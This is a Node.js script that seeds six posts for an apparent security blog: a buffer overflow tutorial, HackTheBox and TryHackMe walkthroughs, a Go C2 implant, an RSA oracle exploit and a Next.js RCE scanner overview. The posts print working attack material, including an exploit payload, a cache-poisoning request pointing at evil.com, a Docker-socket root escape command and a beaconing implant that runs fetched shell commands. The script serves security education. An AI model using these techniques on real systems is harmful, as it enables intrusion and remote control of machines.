#!/usr/bin/env node
const fs = require('fs');
const path = require('path');

const posts = [
  {
    id: 'post-001',
    title: 'Exploiting Buffer Overflows: A Deep Dive into Stack Smashing',
    excerpt:
      'A comprehensive guide to understanding and exploiting classic stack-based buffer overflow vulnerabilities in x86/x64 Linux binaries.',
    content: [
      '## Introduction',
      '',
      'Buffer overflow vulnerabilities have been around since the early days of computing, yet they remain one of the most fascinating attack vectors in binary exploitation. In this post, we will explore the mechanics of stack-based buffer overflows from first principles.',
      '',
      '## What is a Buffer Overflow?',
      '',
      'A buffer overflow occurs when a program writes more data to a buffer than it can hold, causing the extra data to overwrite adjacent memory.',
      '',
      '```c',
      '#include <stdio.h>',
      '#include <string.h>',
      '',
      'void vulnerable(char *input) {',
      '    char buffer[64];',
      '    strcpy(buffer, input);  // No bounds check!',
      '    printf("You entered: %s\\n", buffer);',
      '}',
      '',
      'int main(int argc, char *argv[]) {',
      '    vulnerable(argv[1]);',
      '    return 0;',
      '}',
      '```',
      '',
      '## Stack Layout',
      '',
      'When `vulnerable()` is called, the stack looks like this:',
      '',
      '```',
      'High Address',
      '+-----------------+',
      '|   Return Addr   |  <- Target for overwrite',
      '+-----------------+',
      '|   Saved RBP     |',
      '+-----------------+',
      '|   buffer[64]    |  <- Our input goes here',
      '+-----------------+',
      '|   ...           |',
      'Low Address',
      '```',
      '',
      '## Exploitation',
      '',
      'To exploit this, we need to:',
      '1. Find the offset to the return address',
      '2. Craft our payload',
      '3. Redirect execution',
      '',
      '```python',
      'from pwn import *',
      '',
      'TARGET = "./vulnerable"',
      'p = process(TARGET)',
      '',
      'offset = 72  # 64 byte buffer + 8 bytes saved RBP',
      'ret_addr = 0xdeadbeef',
      '',
      'payload = b"A" * offset',
      'payload += p64(ret_addr)',
      '',
      'p.sendline(payload)',
      'p.interactive()',
      '```',
      '',
      '## Mitigations',
      '',
      'Modern systems employ several protections:',
      '- **ASLR** — Address Space Layout Randomization',
      '- **Stack Canaries** — Random value before return address',
      '- **NX/DEP** — Non-executable stack',
      '- **PIE** — Position Independent Executables',
      '',
      '## Conclusion',
      '',
      'Understanding buffer overflows at this level is crucial for any security researcher. Next: bypassing these mitigations with ROP chains.',
    ].join('\n'),
    category: 'binary-exploitation',
    tags: ['pwn', 'binary-exploitation', 'bof', 'linux', 'x86-64'],
    type: 'post',
    status: 'published',
    featured: true,
    date: '2024-12-15',
    readTime: 12,
    emoji: '💀',
    views: 0,
  },
  {
    id: 'post-002',
    title: 'Web Cache Poisoning to RCE: HackTheBox — Cache Machine',
    excerpt:
      'Full walkthrough of the Cache machine from HackTheBox involving web cache poisoning, SSRF, and privilege escalation via Docker socket abuse.',
    content: [
      '## Machine Info',
      '',
      '| Field | Value |',
      '|-------|-------|',
      '| Name | Cache |',
      '| OS | Linux |',
      '| Difficulty | Hard |',
      '| Points | 40 |',
      '| Platform | HackTheBox |',
      '',
      '## Enumeration',
      '',
      'Starting with a standard nmap scan:',
      '',
      '```bash',
      'nmap -sC -sV -oA cache 10.10.10.188',
      '```',
      '',
      '```',
      'PORT   STATE SERVICE VERSION',
      '22/tcp open  ssh     OpenSSH 7.6p1',
      '80/tcp open  http    Apache httpd 2.4.29',
      '```',
      '',
      '## Web Cache Poisoning',
      '',
      'The `X-Forwarded-Host` header was reflected without proper sanitization:',
      '',
      '```http',
      'GET / HTTP/1.1',
      'Host: cache.htb',
      'X-Forwarded-Host: evil.com',
      '```',
      '',
      'This allowed cache poisoning and serving malicious content to other users.',
      '',
      '## Foothold',
      '',
      'Poisoning redirected the admin to our server; captured credentials led to SSH.',
      '',
      '```bash',
      'ssh ash@10.10.10.188',
      '```',
      '',
      '## Privilege Escalation',
      '',
      'Docker socket was readable:',
      '',
      '```bash',
      'find / -name "docker.sock" 2>/dev/null',
      'docker -H unix:///run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt sh',
      '```',
      '',
      '## Root Flag',
      '',
      '```',
      '# [redacted — solve the machine yourself]',
      '```',
    ].join('\n'),
    category: 'ctf',
    tags: ['htb', 'web', 'cache-poisoning', 'docker', 'privesc'],
    type: 'ctf',
    status: 'published',
    featured: false,
    platform: 'HackTheBox',
    difficulty: 'hard',
    points: 40,
    date: '2024-11-20',
    readTime: 18,
    emoji: '🏴',
    views: 0,
  },
  {
    id: 'post-003',
    title: 'Building a Custom C2 Framework in Go: From Scratch',
    excerpt:
      'Learn how to build a basic Command & Control framework using Go for the implant and Python for the operator console. Educational purposes only.',
    content: [
      '## Overview',
      '',
      'Command & Control (C2) frameworks are essential in red team operations. Understanding how they work matters for both offense and defense.',
      '',
      '> **Disclaimer**: Educational only. Use only against systems you own or have explicit written permission to test.',
      '',
      '## Architecture',
      '',
      '```',
      '[Operator] --HTTP--> [Team Server] --HTTP--> [Implant on Target]',
      '```',
      '',
      '## Implant (Go)',
      '',
      '```go',
      'package main',
      '',
      'import (',
      '    "encoding/json"',
      '    "net/http"',
      '    "os/exec"',
      '    "time"',
      ')',
      '',
      'type Task struct {',
      '    ID      string `json:"id"`',
      '    Command string `json:"cmd"`',
      '}',
      '',
      'func beacon(server string) {',
      '    for {',
      '        resp, _ := http.Get(server + "/task/" + getID())',
      '        var task Task',
      '        json.NewDecoder(resp.Body).Decode(&task)',
      '        if task.Command != "" {',
      '            out, _ := exec.Command("sh", "-c", task.Command).Output()',
      '            sendResult(server, task.ID, string(out))',
      '        }',
      '        time.Sleep(30 * time.Second)',
      '    }',
      '}',
      '```',
      '',
      '## OPSEC Considerations',
      '',
      '- Domain fronting to blend with legitimate traffic',
      '- Jitter in beacon intervals',
      '- Encrypt all communications (TLS minimum)',
      '- Malleable C2 profiles',
      '',
      '## Detection',
      '',
      'Blue teams can watch for:',
      '- Regular beacon intervals',
      '- Suspicious SSL certificates',
      '- Odd DNS patterns',
      '- Parent-child process anomalies',
    ].join('\n'),
    category: 'tools',
    tags: ['c2', 'red-team', 'go', 'malware-dev', 'opsec'],
    type: 'post',
    status: 'published',
    featured: false,
    date: '2024-10-05',
    readTime: 22,
    emoji: '⚙️',
    views: 0,
  },
  {
    id: 'post-004',
    title: 'PicoCTF 2024 — Crypto Challenge: RSA Unpadded Oracle',
    excerpt:
      'Solving a tricky RSA challenge using an unpadded message oracle (blinding) attack to recover plaintext without the private key.',
    content: [
      '## Challenge Description',
      '',
      'An RSA oracle decrypts any ciphertext except the target. Classic blinding attack setup.',
      '',
      '## Given',
      '',
      '```',
      'n = <2048-bit modulus>',
      'e = 65537',
      'c = <target ciphertext>',
      '```',
      '',
      '## Attack: RSA Blinding',
      '',
      '1. Choose random `r`',
      '2. Compute `c_blind = c * r^e mod n`',
      '3. Submit `c_blind` → get `m_blind = m * r mod n`',
      '4. Recover `m = m_blind * inverse(r, n) mod n`',
      '',
      '## Python Exploit',
      '',
      '```python',
      'from Crypto.Util.number import *',
      'import requests',
      '',
      'n = int(open("n.txt").read())',
      'e = 65537',
      'c = int(open("c.txt").read())',
      '',
      'r = getRandomRange(2, n - 1)',
      'c_blind = (c * pow(r, e, n)) % n',
      '',
      'response = requests.post(URL, data={"c": c_blind})',
      'm_blind = int(response.text)',
      '',
      'm = (m_blind * inverse(r, n)) % n',
      'print(long_to_bytes(m))',
      '```',
      '',
      '## Flag',
      '',
      '```',
      '# [redacted — solve the challenge yourself]',
      '```',
    ].join('\n'),
    category: 'ctf',
    tags: ['pico', 'crypto', 'rsa', 'oracle-attack'],
    type: 'ctf',
    status: 'published',
    featured: false,
    platform: 'PicoCTF',
    difficulty: 'medium',
    points: 500,
    date: '2024-09-10',
    readTime: 8,
    emoji: '🔐',
    views: 0,
  },
  {
    id: 'post-005',
    title: 'React2Shell: Hunting RCE in Next.js Server Components',
    excerpt:
      'How CVE-class flaws in React Server Components / Next.js can lead to RCE — and how React2Shell helps defenders find exposed surfaces.',
    content: [
      '## Context',
      '',
      'Modern JavaScript frameworks ship server-side execution paths that look like ordinary UI code. When those paths accept attacker-controlled input without strict validation, the result can be remote code execution.',
      '',
      'This post documents the research mindset behind **React2Shell** — a scanner focused on Next.js / React Server Components attack surface — built for authorized assessments and remediation.',
      '',
      '> Educational and defensive use only. Do not scan systems you do not own or have written permission to test.',
      '',
      '## Attack Surface',
      '',
      'Server Components can deserialize or evaluate payloads that cross trust boundaries:',
      '',
      '- Flight / RSC wire formats',
      '- Server Actions with weak auth',
      '- Prototype pollution into dangerous sinks',
      '',
      '## Scanner Goals',
      '',
      '1. Fingerprint Next.js / RSC endpoints',
      '2. Probe for known-dangerous patterns safely',
      '3. Produce actionable remediation notes',
      '',
      '## Remediation Checklist',
      '',
      '- Patch Next.js / React to fixed releases',
      '- Restrict Server Actions with authz',
      '- Validate and schema-check all server inputs',
      '- Monitor for anomalous RSC traffic',
      '',
      '## Conclusion',
      '',
      'Framework convenience is not a security boundary. Treat Server Components like any other remote interpreter — under the wrong conditions, that is exactly what they become.',
    ].join('\n'),
    category: 'web',
    tags: ['web', 'nextjs', 'rce', 'cve', 'research'],
    type: 'post',
    status: 'published',
    featured: true,
    date: '2025-03-12',
    readTime: 10,
    emoji: '⚡',
    views: 0,
  },
  {
    id: 'post-006',
    title: 'TryHackMe — Introductory Linux Privilege Escalation Notes',
    excerpt:
      'A practical writeup-style checklist for Linux privilege escalation: enumeration, SUID, cron, sudo, and kernel pitfalls.',
    content: [
      '## Lab Info',
      '',
      '| Field | Value |',
      '|-------|-------|',
      '| Platform | TryHackMe |',
      '| Focus | Linux PrivEsc |',
      '| Difficulty | Easy–Medium |',
      '',
      '## Enumeration First',
      '',
      'Never escalate blind. Collect:',
      '',
      '```bash',
      'id; whoami; hostname',
      'uname -a',
      'sudo -l',
      'find / -perm -4000 2>/dev/null',
      '```',
      '',
      '## High-Signal Paths',
      '',
      '### SUID binaries',
      'Unusual SUID owners often lead to GTFOBins primitives.',
      '',
      '### Cron jobs',
      'Writable scripts run as root are free shells.',
      '',
      '### sudo misconfigs',
      '`NOPASSWD` on editors, interpreters, or package managers is game over.',
      '',
      '## Methodology Template',
      '',
      '1. Enumerate thoroughly',
      '2. Identify one weak trust boundary',
      '3. Exploit locally',
      '4. Stabilize shell',
      '5. Document for the report',
      '',
      '## Closing',
      '',
      'Privilege escalation is pattern recognition. Build your own notes — this writeup is a starting scaffold.',
    ].join('\n'),
    category: 'ctf',
    tags: ['thm', 'linux', 'privesc', 'enumeration'],
    type: 'ctf',
    status: 'published',
    featured: false,
    platform: 'TryHackMe',
    difficulty: 'easy',
    points: 20,
    date: '2025-01-18',
    readTime: 9,
    emoji: '🐧',
    views: 0,
  },
];

const out = path.join(__dirname, '..', 'assets', 'data', 'posts.json');
fs.mkdirSync(path.dirname(out), { recursive: true });
fs.writeFileSync(out, JSON.stringify(posts, null, 2));
console.log('Wrote', posts.length, 'posts to', out);
